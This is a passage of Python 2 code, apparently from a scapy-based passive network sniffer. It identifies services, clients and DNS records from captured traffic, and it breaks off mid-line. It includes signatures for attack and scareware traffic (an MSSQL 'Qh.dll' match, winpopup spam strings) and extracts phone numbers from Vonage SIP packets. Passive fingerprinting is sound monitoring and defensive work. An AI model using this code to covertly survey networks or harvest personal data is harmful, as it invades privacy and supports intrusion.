\"imap/generic\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"imap/generic\"\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\telif (sport == \"783\") and (Payload != None) and (Payload.find('SPAMD/1.1 ') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"spamd/spamd\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"spamd/spamd\"\n\t\t\t\t\t\telif ( (sport == \"3128\") or (sport == \"80\") ) and (Payload != None) and (Payload.find('Via: ') > -1) and (Payload.find(' (squid/') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"proxy/squid\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"proxy/squid\"\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\telif ((LiveTCPService.has_key(ToPort)) and (LiveTCPService[ToPort] == True)):\t\t#If the \"To\" side is a known TCP server:\n\t\t\t\t\tClientKey = sIP + \",TCP_\" + dport\t#Note: CLIENT ip and SERVER port\n\t\t\t\t\tif (not ClientDescription.has_key(ClientKey)):\n\t\t\t\t\t\tif (dport == \"22\") and (Payload != None) and ( (Payload.find('SSH-2.0-OpenSSH_') > -1) or (Payload.find('SSH-1.5-OpenSSH_') > -1) ):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"ssh/openssh\")\n\t\t\t\t\t\t#As cute as it is to catch this, it miscatches any relay that's carrying a pine-generated mail.\n\t\t\t\t\t\t#elif (dport == \"25\") and (Payload != None) and (Payload.find('Message-ID: <Pine.') > -1):\n\t\t\t\t\t\t#\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"smtp/pine\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: libwww-perl/') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/libwww-perl\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: Lynx') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/lynx\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: Mozilla') > -1) and (Payload.find(' Firefox/') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/firefox\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: Wget/') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/wget\")\n\t\t\t\t\t\telif (dport == \"143\") and (Payload != None) and (Payload.find('A0001 CAPABILITY') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"imap/generic\")\n\t\t\t\t\t\t\t#LogNewPayload(ClientPayloadDir, ClientKey, Payload)\n\t\t\t\t\t\telif (dport == \"783\") and (Payload != None) and (Payload.find('PROCESS SPAMC') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"spamd/spamc\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ClientPayloadDir, ClientKey, Payload)\n\t\t\t\telse:\t#Neither port pair is known as a server\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t#Following is debugging at best; it should only show up early on as the sniffer listens to conversations for which it didn't hear the SYN/ACK\n\t\t\t\t\t#print \"note: neither \" + FromPort + \" nor \" + ToPort + \" is listed as a live service.\"\n\t\t\telse:\t#Other TCP flag combinations here\n\t\t\t\tUnhandledPacket(p)\n\t\telif p['IP'].proto == 17 and (type(p['UDP']) == UDP):\t\t#UDP. We have to check the object type as well as we do get (corrupted? truncated?) packets with type 17 that aren't udp: AttributeError: 'NoneType' object has no attribute 'sport'\n\t\t\t#FIXME - possibly run udp packets through ServiceFPs as well?\n\t\t\tsport=str(p['UDP'].sport)\n\t\t\tdport=str(p['UDP'].dport)\n\t\t\tSrcService = sIP + \",UDP_\" + sport\n\t\t\tDstService = dIP + \",UDP_\" + dport\n\t\t\tSrcClient = sIP + \",UDP_\" + dport\n\t\t\tPayload = p['Raw.load']\n\n\t\t\t#Multicast DNS: http://files.multicastdns.org/draft-cheshire-dnsext-multicastdns.txt\n\t\t\t#- usually sent to 224.0.0.251 (or FF02::FB) (link-local multicast).\n\t\t\t#\t- if \".local.\" in query, these MUST be the target IPs\n\t\t\t#\t- non-local queries may be sent to these or normal dns servers\n\t\t\t#\t- rdns queries for \"254.169.in-addr.arpa.\" MUST be sent to 224.0.0.251\n\t\t\t#\t- rdns queries for \"8.e.f.ip6.arpa.\", \"9.e.f.ip6.arpa.\",\"a.e.f.ip6.arpa.\", and \"b.e.f.ip6.arpa.\" MUST be sent to the IPv6 mDNS link-local multicast address FF02::FB.\n\t\t\t#- sent to udp port 5353\n\t\t\t#- generic clients may use \"single-dns-object.local.\", such as \"sparrow.local.\"\n\t\t\t#- responses have IP TTL = 255 to check that packet originated on-lan\n\n\t\t\t#Multicast DNS, placed next to normal dns, out of numerical order\n\t\t\tif (dport == \"5353\") and ( (p['IP'].ttl == 1) or (p['IP'].ttl == 255) ):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcClient)) or (LiveUDPService[SrcClient] == False)):\n\t\t\t\t\tLiveUDPService[SrcClient] = True\n\t\t\t\t\tif (dIP == \"224.0.0.251\"):\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"mdns/broadcastclient\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"mdns/client\")\n\n\t\t\t\t\t#Extract dns answers like with 53; change elif to if and add 5353 to ports on next if?\n\t\t\t\t\t#At the moment, no; scapy does not appear to parse 5353 as dns.\n\t\t\t\t\t#else:\n\t\t\t\t\t#\tUnhandledPacket(p)\n\t\t\t#FIXME - add check for \"if isinstance(p['DNS'], whatevertype):\there and at all p[] accesses.\n\t\t\telif (sport == \"53\") and (isinstance(p['DNS'], DNS)) and (p['DNS'].qr == 1):\t\t#qr == 1 is a response\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t#FIXME - Also report the TLD from one of the query answers to show what it's willing to answer for?\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"dns/server\")\n\t\t\t\t#Now we extract dns answers. First, check that there's no dns error:\n\t\t\t\tif (p['DNS'].rcode == 0):\t\t\t#No error\n\t\t\t\t\tDNSBlocks = [ ]\n\t\t\t\t\tCNAMERecs = [ ]\t\t\t\t#We hold onto all cnames until we've processed all PTR's and A's here\n\t\t\t\t\tif (p['DNS'].ancount > 0):\t\t#If we have at least one answer from the answer block, process it\n\t\t\t\t\t\tDNSBlocks.append(p[DNS].an)\n\t\t\t\t\tif (p['DNS'].arcount > 0):\t\t#Likewise for the \"additional\" block\n\t\t\t\t\t\tDNSBlocks.append(p[DNS].ar)\n\t\t\t\t\tfor OneAn in DNSBlocks:\n\t\t\t\t\t\t#Thanks to Philippe Biondi for showing me how to extract additional records.\n\t\t\t\t\t\t#Debug(\"Start dns extract\" + str(p['DNS'].ancount))\n\t\t\t\t\t\t#OneAn = p[DNS].an\n\t\t\t\t\t\t#while OneAn is not NoPayload:\t\t#This doesn't seem to stop at the end of the list; incorrect syntax.\n\t\t\t\t\t\twhile isinstance(OneAn,DNSRR):\t\t#Somewhat equivalent:\twhile not isinstance(an, NoPayload):\n\t\t\t\t\t\t\n\t\t\t\t\t\t\t#print \"Type: \" + str(type(OneAn))\t\t#All of type scapy.DNSRR\n\t\t\t\t\t\t\tif (OneAn.rclass == 1) and (OneAn.type == 1):\t\t#\"IN\" class and \"A\" type answer\n\t\t\t\t\t\t\t\tDNSIPAddr = OneAn.rdata\n\t\t\t\t\t\t\t\tDNSHostname = OneAn.rrname.lower()\n\t\t\t\t\t\t\t\t#Check new hostname to see if it's in the list.\n\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(DNSIPAddr + \",A\")) or (not(DNSHostname in DNSRecord[DNSIPAddr + \",A\"])):\n\t\t\t\t\t\t\t\t\tReportId(\"DN\", DNSIPAddr, \"A\", DNSHostname, \"\")\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 2):\t\t\t#\"IN\" class and \"NS\" answer\n\t\t\t\t\t\t\t\tpass\t\t\t\t\t\t\t#Perhaps later\n\t\t\t\t\t\t\t\t#Like cnames, this is object -> nameserver hostname, so these would need to be queued like cnames until we're done with A's and PTR's.\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 5):\t\t\t#\"IN\" class and \"CNAME\" answer\n\t\t\t\t\t\t\t\tCNAMERecs.append(OneAn)\t\t\t\t\t#Remember the record; we'll process these after the PTR's and A's\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 6):\t\t\t#\"IN\" class and \"SOA\" answer\n\t\t\t\t\t\t\t\tpass\t\t\t\t\t\t\t#Not immediately useful, perhaps later\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 12):\t\t#\"IN\" class and \"PTR\" type answer\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#For input of '182.111.59.66.in-addr.arpa.' :\n\t\t\t\t\t\t\t\tDNSIPAddr = OneAn.rrname.replace(\".in-addr.arpa.\", \"\")\t\t# '182.111.59.66'\n\t\t\t\t\t\t\t\tDNSIPAddr = DNSIPAddr.split('.')\t\t\t\t# ['182', '111', '59', '66']\n\t\t\t\t\t\t\t\tDNSIPAddr.reverse()\t\t\t\t\t\t# ['66', '59', '111', '182']\n\t\t\t\t\t\t\t\tDNSIPAddr = string.join(DNSIPAddr, '.')\t\t\t\t# '66.59.111.182'\n\t\t\t\t\t\t\t\t#Check that we end up with a legal IPv4 address before continuing; we're getting garbage.\n\t\t\t\t\t\t\t\tif (re.search('^[1-9][0-9\\.]*[0-9]$', DNSIPAddr) == None):\n\t\t\t\t\t\t\t\t\tDebug(\"Odd PTR rrname: \" + OneAn.rrname)\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tDNSHostname = OneAn.rdata.lower()\n\t\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(DNSIPAddr + \",PTR\")) or (not(DNSHostname in DNSRecord[DNSIPAddr + \",PTR\"])):\n\t\t\t\t\t\t\t\t\t\tReportId(\"DN\", DNSIPAddr, \"PTR\", DNSHostname, \"\")\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 15):\t\t#\"IN\" class and \"MX\" answer\n\t\t\t\t\t\t\t\tpass\t\t\t\t\t\t\t#Possibly later\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 28):\t\t#\"IN\" class and \"AAAA\" answer\n\t\t\t\t\t\t\t\tDNSIPAddr = OneAn.rdata.upper()\n\t\t\t\t\t\t\t\tDNSHostname = OneAn.rrname.lower()\n\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(DNSIPAddr + \",AAAA\")) or (not(DNSHostname in DNSRecord[DNSIPAddr + \",AAAA\"])):\n\t\t\t\t\t\t\t\t\tReportId(\"DN\", DNSIPAddr, \"AAAA\", DNSHostname, \"\")\n\n\t\t\t\t\t\t\t#Move to the next DNS object in the \"an\" block\n\t\t\t\t\t\t\tOneAn = OneAn.payload\n\t\t\t\t\tfor OneCNAME in CNAMERecs:\t\t#Now that we have all A/PTR's, go back and turn cname records into pseudo-A's\n\t\t\t\t\t\tif isinstance(OneCNAME,DNSRR):\n\t\t\t\t\t\t\tAlias = OneCNAME.rrname.lower()\n\t\t\t\t\t\t\tExisting = OneCNAME.rdata.lower()\n\t\t\t\t\t\t\tif isFQDN(Alias) and isFQDN(Existing):\n\t\t\t\t\t\t\t\tif HostIPs.has_key(Existing):\n\t\t\t\t\t\t\t\t\tfor OneIP in HostIPs[Existing]:\t\t\t\t#Loop through each of the IPs for the canonical name, and\n\t\t\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(OneIP + \",CNAME\")) or (not(Alias in DNSRecord[OneIP + \",CNAME\"])):\n\t\t\t\t\t\t\t\t\t\t\tReportId(\"DN\", OneIP, \"CNAME\", Alias, \"\")\t#report them as kind-of A records for the Alias.\n\t\t\t\t\t\t\t\t#If we don't have a A/PTR record for \"Existing\", just ignore it. Hopefully we'll get the Existing A/PTR in the next few answers, and will re-ask for the CNAME later, at which point we'll get a full cname record.\n\t\t\t\t\t\t\t\t#else:\n\t\t\t\t\t\t\t\t#\tDebug(\"CNAME \" + Alias + \" -> \" + Existing + \" requested, but no IP's for the latter, skipping.\")\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tDebug(\"One of \" + Alias + \" and \" + Existing + \" isn't an FQDN, skipping cname processing.\")\n\t\t\t\telif (p['DNS'].rcode == 1):\t\t\t#FormErr: server responding to an improperly formatted request\n\t\t\t\t\tpass\n\t\t\t\telif (p['DNS'].rcode == 2):\t\t\t#ServFail: domain exists, root nameservers list authoritative name servers, but authNS's won't answer queries\n\t\t\t\t\tpass\n\t\t\t\telif (p['DNS'].rcode == 3):\t\t\t#NXDOMAIN: root nameservers don't have any listing (domain doesn't exist or is on hold)\n\t\t\t\t\tpass\n\t\t\t\telif (p['DNS'].rcode == 5):\t\t\t#Query refused\n\t\t\t\t\tpass\n\t\t\t\telse:\t#rcode indicates an error\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"53\") and (type(p['DNS']) == DNS) and (p['DNS'].qr == 0):\t#dns query\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"dns/client\")\n\t\t\telif (sport == \"67\") and (dport == \"68\"):\t\t#Bootp/dhcp server talking to client\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"bootpordhcp/server\")\n\t\t\telif (sport == \"68\") and (dport == \"67\"):\t\t#Bootp/dhcp client talking to server\n\t\t\t\tif (sIP != \"0.0.0.0\"):\t\t\t\t#If the client is simply renewing an IP, remember it.\n\t\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"bootpordhcp/client\")\n\t\t\t\t#else:\t\t\t\t\t\t#If you want to record which macs are asking for addresses, do it here.\n\t\t\t\t#\tpass\n\t\t\telif (sport == \"123\") and (dport == \"123\") and (p['NTP'].stratum != ''):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"ntp/generic\")\n\t\t\telif (dport == \"123\") and ( (dIP == \"216.115.23.75\") or (dIP == \"216.115.23.76\") or (dIP == \"69.59.240.75\") ):\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"ntp/vonageclient\")\n\t\t\telif (sport == \"123\") and ( (sIP == \"216.115.23.75\") or (sIP == \"216.115.23.76\") or (sIP == \"69.59.240.75\") ):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"ntp/vonageserver\")\n\t\t\telif (dport == \"137\"):\t\t\t#netbios-ns\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (p['Ethernet'].dst.upper() == \"FF:FF:FF:FF:FF:FF\"):\t\t\t#broadcast\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"netbios-ns/broadcastclient\")\n\t\t\t\t\telif (Payload != None) and (Payload.find('CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA') > -1):\t#wildcard\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"netbios-ns/wildcardclient\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"netbios-ns/unicastclient\")\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"500\") and (dport == \"500\") and (p['ISAKMP'].init_cookie != ''):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"isakmp/generic\")\n\t\t\telif (dport == \"512\"):\t\t\t#BIFF\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('@') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"biff/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif ( (dport == \"1026\") or (dport == \"1027\") or (dport == \"1028\") ):\t#winpopup spam client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and ( (Payload.find('Download Registry Update from:') > -1) or (Payload.find('CRITICAL ERROR MESSAGE! - REGISTRY DAMAGED AND CORRUPTED.') > -1) or (Payload.find('Your system registry is corrupted and needs to be cleaned immediately.') > -1) or (Payload.find('CRITICAL SYSTEM ERRORS') > -1) ):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"winpopup/spamclient\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"1434\"):\t\t#Probable mssql attack\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('Qh.dll') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"mssql/clientattack\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"1900\") and (dport == \"1900\") and (dIP == \"239.255.255.250\"):\t\t#SSDP\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('NOTIFY') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"ssdp/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"3865\") and (dIP == \"255.255.255.255\"):\t\t#XPL, http://wiki.xplproject.org.uk/index.php/Main_Page\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"xpl/client\")\n\t\t\telif (sport == \"5061\") and (dport == \"5061\") and ( (dIP == \"216.115.30.28\") or (dIP == \"69.59.227.77\") or (dIP == \"69.59.232.33\") or (dIP == \"69.59.240.84\") ):\t\t#Vonage SIP client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('.vonage.net:5061 SIP/2.0') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tSipMatch = SipPhoneMatch.search(Payload)\n\t\t\t\t\t\tif (SipMatch != None) and (len(SipMatch.groups()) >= 1):\n\t\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"sip/vonage_client, phone number: \" + SipMatch.group(1))\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"sip/vonage_client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"5061\") and (dport == \"5061\") and ( (sIP == \"216.115.30.28\") or (sIP == \"69.59.227.77\") or (sIP == \"69.59.232.33\") or (sIP == \"69.59.240.84\") ):\t#Vonage SIP server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('.vonage.net:5061>') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"sip/vonage_server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"6515\") and (dport == \"6514\") and (dIP == \"255.255.255.255\"):\t\t#mcafee ASaP broadcast, looking for a proxy out. http://www.myasap.de/intl/EN/content/virusscan_asap/faq_new.asp\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('<rumor version=') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"asap/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif ( (sport == \"9052\") or (sport == \"9053\") or (sport == \"9054\") ) and ( (sIP == \"205.188.146.72\") or (sIP == \"205.188.157.241\") or (sIP == \"205.188.157.242\") or (sIP == \"205.188.157.243\") or (sIP == \"205.188.157.244\") or (sIP == \"64.12.51.145\") or (sIP == \"64.12.51.148\") or (sIP == \"149.174.54.131\") ):\t#Possibly AOL dns response\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('dns-01') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"aoldns/server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"27005\") and ( (dport == \"27016\") or (dport == \"27017\") ):\t\t\t\t#Halflife client live game\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\telif (dport == \"27013\") and (dIP == \"207.173.177.12\"):\t\t\t\t#variable payload, so can't (Payload != None) and (Payload.find('Steam.exe') > -1)\t\t\t\t#Halflife client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\telif (sport == \"27013\") and (sIP == \"207.173.177.12\"):\t\t\t\t\t\t\t#halflife server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\telif ( (sport == \"27016\") or (sport == \"27017\") ) and (dport == \"27005\"):\t\t\t\t#halflife server live game\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\telif ( (dport == \"27015\") or (dport == \"27016\") or (dport == \"27025\") or (dport == \"27026\") ):\t\t#Variable payload, so can't: (Payload != None) and (Payload.find('basic') > -1)\t#Halflife client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\telif (dport == \"27017\") and ( (dIP == \"69.28.148.250\") or (dIP == \"69.28.156.250\") or (dIP == \"72.165.61.161\") or (dIP == \"72.165.61.185\") or (dIP == \"72.165.61.186\") or (dIP == \"72.165.61.188\") or (dIP == \"68.142.64.164\") or (dIP == \"68.142.64.165\") or (dIP == \"68.142.64.166\") ):\t#Steamfriends client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('VS01') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"steamfriends/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"27017\") and ( (sIP == \"69.28.148.250\") or (sIP == \"69.28.156.250\") or (sIP == \"72.165.61.161\") or (sIP == \"72.165.61.185\") or (sIP == \"72.165.61.186\") or (sIP == \"72.165.61.188\") or (sIP == \"68.142.64.164\") or (sIP == \"68.142.64.165\") or (sIP == \"68.142.64.166\") ):\t#Steamfriends server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('VS01') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"steamfriends/server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif ( (sport == \"21020\") or (sport == \"21250\") or (sport == \"27016\") or (sport == \"27017\") or (sport == \"27018\") or (sport == \"27030\") or (sport == \"27035\") or (sport == \"27040\") or (sport == \"28015\") ):\t\t\t\t\t\t\t#halflife server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('Team Fortress') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"27019\"):\t\t\t\t\t\t\t#halflife server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\telif ( (dport == \"1265\") or (dport == \"20100\") or (dport == \"21550\") or (dport == \"27000\") or (dport == \"27017\") or (dport == \"27018\") or (dport == \"27019\") or (dport == \"27022\") or (dport == \"27030\") or (dport == \"27035\") or (dport == \"27050\") or (dport == \"27078\") or (dport == \"27080\") or (dport == \"28015\") or (dport == \"28100\") or (dport == \"45081\") ):\t\t#Halflife client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('Source Engine Query') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"24441\"):\t\t\t#Pyzor\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and 